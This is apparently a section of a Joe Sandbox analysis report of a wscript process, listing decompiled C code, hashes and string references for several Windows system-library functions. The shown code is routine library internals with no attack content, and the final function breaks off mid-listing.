Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: c73e280df82aca7216cb7b115fe014d417004062c74272af3a1079b26d5ab1ba
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: B431DF327043056BE720DF25CD88F9A7B99BB84754F044229BEA9DB280E6B0E944CB95

Uniqueness

Uniqueness Score: -1.00%

Function 059C3884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E059C3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E05989650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L05964620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E05989650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x059c3893
0x059c3896
0x059c3899
0x059c389f
0x059c38a0
0x059c38a4
0x059c38a9
0x059c38ac
0x059c38ad
0x059c38ae
0x059c38af
0x059c38b1
0x059c38b4
0x059c38bb
0x059c38bc
0x059c38bd
0x059c38c4
0x059c38c8
0x059c38ca
0x059c38ca
0x059c38d5
0x059c393e
0x059c3940
0x059c3942
0x059c3952
0x059c3954
0x059c3961
0x059c3961
0x059c3967
0x059c396e
0x059c396e
0x059c3947
0x059c394c
0x00000000
0x059c394c
0x059c38ea
0x059c38ee
0x059c38f8
0x059c38f9
0x059c38ff
0x059c3900
0x059c3902
0x059c3903
0x059c390b
0x059c390f
0x059c3950
0x00000000
0x059c3950
0x059c3915
0x059c391d
0x059c391d
0x059c3922
0x059c3926
0x00000000
0x059c3928
0x059c392b
0x059c392b
0x059c3935
0x059c3937
0x059c3937
0x00000000
0x059c3935
0x059c3926
0x059c38f0
0x00000000

Strings

BinaryName, xrefs: 059C38B4

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 5e21012bb31083d5452f1804d2a8b334bfa170e429a3341e76b8fe8a4dd84198
Instruction ID: a252cd60d1ee7dafba1432651073b8230ca02cda1033b1726ea9d13fc20b1796
Opcode Fuzzy Hash: 5e21012bb31083d5452f1804d2a8b334bfa170e429a3341e76b8fe8a4dd84198
Instruction Fuzzy Hash: A531E532904519FFDB15DA58C945E7FBB79FB80720F0189ADE915AB250D730AE04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0597D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0597D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x5a3d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E05964120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0598B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E059898D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E059895D0();
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0597d29c
0x0597d2a6
0x0597d2b1
0x0597d2b5
0x0597d2b6
0x0597d2bc
0x0597d2bd
0x0597d2be
0x0597d2bf
0x0597d2c2
0x0597d2c4
0x0597d2cc
0x0597d384
0x0597d34b
0x0597d34f
0x0597d350
0x0597d351
0x0597d35c
0x0597d35c
0x0597d2d6
0x0597d2da
0x0597d2e1
0x0597d361
0x0597d369
0x0597d36d
0x0597d2e3
0x0597d2e3
0x0597d2e3
0x0597d2e5
0x0597d2ed
0x0597d2f5
0x0597d2fa
0x0597d302
0x0597d303
0x0597d30b
0x0597d30f
0x0597d313
0x0597d318
0x0597d31c
0x0597d320
0x0597d379
0x0597d37d
0x00000000
0x00000000
0x059baffe
0x059bb001
0x059bb011
0x00000000
0x0597d322
0x0597d322
0x0597d330
0x0597d337
0x0597d35d
0x0597d339
0x0597d33f
0x0597d38c
0x0597d38c
0x0597d33f
0x0597d349
0x00000000
0x0597d349

Strings

@, xrefs: 0597D303

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ed91e29547f0ae2bf9f8fe1d421018043cbee587dc88cd480d9157433255a5cb
Instruction ID: c2efb98f165b7e50978d00a5836f6080991b95fa5472c49286d89868d9fbec69
Opcode Fuzzy Hash: ed91e29547f0ae2bf9f8fe1d421018043cbee587dc88cd480d9157433255a5cb
Instruction Fuzzy Hash: 5E3191B16083099FD711DF28C984DABBBE9FFC5658F04092EF99583210D634ED09CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05951B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E05951B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0598BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0598A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0598A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L05964620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x05951b8f
0x05951b9a
0x05951b9c
0x05951b9e
0x05951ba3
0x059a7010
0x059a7010
0x00000000
0x05951ba9
0x05951ba9
0x05951bae
0x00000000
0x05951bc5
0x05951bca
0x05951bcf
0x05951bd0
0x05951bd1
0x05951bd2
0x05951bd6
0x05951bdc
0x05951be0
0x059a6ffc
0x059a7000
0x00000000
0x059a7006
0x059a7009
0x059a7009
0x05951be6
0x05951bec
0x05951c0b
0x05951c0b
0x05951c0c
0x05951c11
0x05951c12
0x05951c15
0x05951c1b
0x05951c1f
0x05951c31
0x05951c33
0x059a7026
0x059a7026
0x05951c21
0x05951c24
0x05951c24
0x05951bee
0x05951bee
0x05951bf2
0x05951c3a
0x05951bf4
0x05951bf4
0x05951c05
0x05951c05
0x05951c09
0x05951c3e
0x00000000
0x00000000
0x00000000
0x05951c09
0x05951bec
0x05951be0
0x05951bae
0x05951c2e

Strings

WindowsExcludedProcs, xrefs: 05951BC5

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 20c15744f31e97bbb76053b1d26f344217ba4932fe5a55d2799f1fe557ff7c4e
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 8421F537A04228ABCB22DA95C844F6FB7AEFF81660F054425FD559B200D635DC10E7F0

Uniqueness

Uniqueness Score: -1.00%

Function 0596F716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0596F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0596f71d
0x0596f722
0x0596f726
0x059b4770
0x0596f765
0x0596f769
0x0596f769
0x0596f732
0x059b477a
0x00000000
0x059b477a
0x0596f738
0x0596f73a
0x0596f73c
0x0596f73f
0x0596f746
0x0596f778
0x0596f7a9
0x0596f7a9
0x0596f754
0x0596f75a
0x0596f75d
0x0596f75f
0x0596f761
0x0596f76f
0x0596f771
0x0596f771
0x0596f76f
0x0596f763
0x00000000
0x0596f763
0x0596f77d
0x0596f7a3
0x0596f7a5
0x00000000
0x0596f7a5
0x0596f77f
0x0596f782
0x0596f784
0x0596f786
0x00000000
0x00000000
0x00000000
0x0596f788
0x0596f748
0x0596f74d
0x0596f78d
0x0596f793
0x0596f7b7
0x0596f7bc
0x00000000
0x0596f7bc
0x0596f798
0x00000000
0x00000000
0x0596f79d
0x0596f7b0
0x00000000
0x0596f7b0
0x0596f79f
0x00000000
0x0596f74f
0x0596f74f
0x00000000
0x0596f74f

Strings

Actx , xrefs: 0596F73F

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 9e6e3e58aee002f3b5c200abb1e985689afbebda616c5a8e76080ad47395d13d
Instruction ID: 7e766177197f928e1138e2768801fa146cfaa0ef8428759a63080a9cd8ee6686
Opcode Fuzzy Hash: 9e6e3e58aee002f3b5c200abb1e985689afbebda616c5a8e76080ad47395d13d
Instruction Fuzzy Hash: F711B6353087028BEB248E1DA69177672DFFB95724F2D493AE466CB399DB70C8488343

Uniqueness

Uniqueness Score: -1.00%

Function 059F8DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E059F8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x5a20d50);
				E0599D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E059D5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0599DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0599DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0599D130(_t34, _t39, _t40);
			}

0x059f8df1
0x059f8df1
0x059f8df1
0x059f8df1
0x059f8df1
0x059f8df1
0x059f8df3
0x059f8df8
0x059f8dfd
0x059f8e00
0x059f8e0e
0x059f8e2a
0x059f8e36
0x059f8e38
0x059f8e3c
0x059f8e46
0x059f8e46
0x059f8e36
0x059f8e50
0x059f8e56
0x059f8e59
0x059f8e5c
0x059f8e60
0x059f8e67
0x059f8e6d
0x059f8e73
0x059f8e74
0x059f8eb1
0x059f8ebd

Strings

Critical error detected %lx, xrefs: 059F8E21

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 1286577474f9263bd723e5984b086255eb0dd25c08ee49ccacbca861d2563c94
Instruction ID: 1ab4eb6fb18172fd4e6e3b09be738625e99257d230bc037430d9e3a8575b5070
Opcode Fuzzy Hash: 1286577474f9263bd723e5984b086255eb0dd25c08ee49ccacbca861d2563c94
Instruction Fuzzy Hash: F1116975E15348EBDF28DFA8864ABDCBBB5BB44314F24425ED529AB292C3341602CF24

Uniqueness

Uniqueness Score: -1.00%

Function 059DFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 059DFF60

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: c306910de8b625bdfffe2eb05aa2fe62f155f29788ea50b9044c169384963258
Instruction ID: dfc21f845ae2f3edf190cad781e645a35b2e8704f245d15855ba55baa4eab7bb
Opcode Fuzzy Hash: c306910de8b625bdfffe2eb05aa2fe62f155f29788ea50b9044c169384963258
Instruction Fuzzy Hash: 4F118E75A10288EFDF16DB58C98AF98FBB2FF48705F148454F50667161C739AA40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 05A15BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E05A15BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x5a21178);
				E0599D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E05A14C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0598D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E05A15542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x5a360e8;
								if( *0x5a360e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x5a360e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E05989710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E05986DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
